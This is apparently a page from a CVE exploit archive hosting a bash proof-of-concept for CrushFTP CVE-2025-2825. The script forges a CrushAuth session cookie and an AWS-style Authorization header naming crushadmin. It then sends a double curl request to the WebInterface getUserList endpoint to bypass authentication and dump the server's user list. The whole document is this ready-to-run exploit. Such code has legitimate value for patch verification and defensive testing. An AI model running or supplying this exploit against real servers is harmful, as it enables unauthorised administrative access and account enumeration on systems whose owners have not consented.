4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-2825
README.md
Rendering markdown...
POC / exploit_crushftp.sh SH
⬇ Raw GitHub ✕ Close 
#!/bin/bash

# CrushFTP CVE-2025-2825 Auth Bypass Exploit (Improved Version)
# Author: jeongwoongyoon
# This PoC performs a double-request strategy (like nuclei) to increase reliability.
# Usage: ./exploit_crushftp.sh http://<target>:<port> [CrushAuth] [c2f]

TARGET=$1
CUSTOM_CRUSHAUTH=$2
CUSTOM_C2F=$3

if [ -z "$TARGET" ]; then
  echo "Usage: $0 http://<target>:<port> [CrushAuth] [c2f]"
  exit 1
fi

# Generate or use provided CrushAuth/C2F
if [ -z "$CUSTOM_CRUSHAUTH" ]; then
  PREFIX=$(shuf -i 1000000000000-9999999999999 -n 1)
  MID=$(head /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 26)
  SUFFIX=$(shuf -i 1000-9999 -n 1)
  CRUSHAUTH="${PREFIX}_${MID}${SUFFIX}"
  C2F=$SUFFIX
else
  CRUSHAUTH=$CUSTOM_CRUSHAUTH
  C2F=$CUSTOM_C2F
fi

URL="$TARGET/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=$C2F"

echo "[+] Target: $TARGET"
echo "[+] CrushAuth: $CRUSHAUTH"
echo "[+] Length: ${#CRUSHAUTH}"
echo "[+] c2f: $C2F"
echo "[*] Sending double exploit request..."

# Send first warmup request (some servers need this)
curl -s --compressed "$URL" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" \
  -H "Cookie: CrushAuth=${CRUSHAUTH}; currentAuth=${C2F}" \
  -H "Origin: $TARGET" \
  -H "Referer: $TARGET/WebInterface/login.html" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Accept-Encoding: identity" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
  -H "Connection: close" > /dev/null

sleep 0.3

# Second actual trigger request
RESPONSE=$(curl -s --compressed "$URL" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" \
  -H "Cookie: CrushAuth=${CRUSHAUTH}; currentAuth=${C2F}" \
  -H "Origin: $TARGET" \
  -H "Referer: $TARGET/WebInterface/login.html" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Accept-Encoding: identity" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
  -H "Connection: close")

if echo "$RESPONSE" | grep -q "<user_list_subitem>"; then
  echo "[+] Exploit successful!"
  echo "$RESPONSE" | grep "<user_list_subitem>"
else
  echo "[-] Exploit failed or blocked."
  echo "[*] Partial Response:"
  echo "$RESPONSE" | head -n 20
fi